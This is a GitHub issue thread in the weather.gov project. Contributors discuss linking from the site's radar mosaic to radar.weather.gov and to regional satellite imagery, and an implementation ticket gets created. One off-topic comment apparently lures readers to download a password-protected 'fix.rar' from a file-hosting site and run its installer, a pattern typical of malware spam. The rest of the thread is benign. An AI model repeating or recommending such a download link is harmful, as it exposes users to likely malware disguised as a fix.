### ISSUE TITLE
Link to radar.weather.gov for more details

### ISSUE THREAD

**Issue by shadkeene** [weather-gov/weather.gov#1648]
We want to push folks to radar.weather.gov for more details and options for RADAR imagery, outside of the composite reflectivity mosaic that we're providing them.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by colinmurphy01** [comment]
Confirming we want to refer people to radar.weather.gov over [the viewer](https://viewer.weather.noaa.gov/general)?

**Comment by greg-does-weather** [comment]
Yep

**Comment by colinmurphy01** [comment]
@igorkorenfeld this is something that fell off our to-do list. Is this something we want included for r8?

**Comment by coreypieper** [comment]
Lets do the same thing for satellite. For example, radar [here](https://beta.weather.gov/point/32.656/-97.411?#current) could link to [this](https://www.star.nesdis.noaa.gov/GOES/wfo.php?wfo=fwd).

**Comment by shadkeene** [comment]
@coreypieper @mel-keene-gsa @colinmurphy01 We should bump this up soon...and start doing what we've been saying--provide for most common needs and [smartly] link to other places for more detailed information.  I agree with above comment that we shouldn't just do a generic link but probably link in a useful way (maybe regional and additional local satellite imagery...and keep radar location for same area)

**Comment by partly-igor** [comment]
Implementation ticket #2156 created for eng
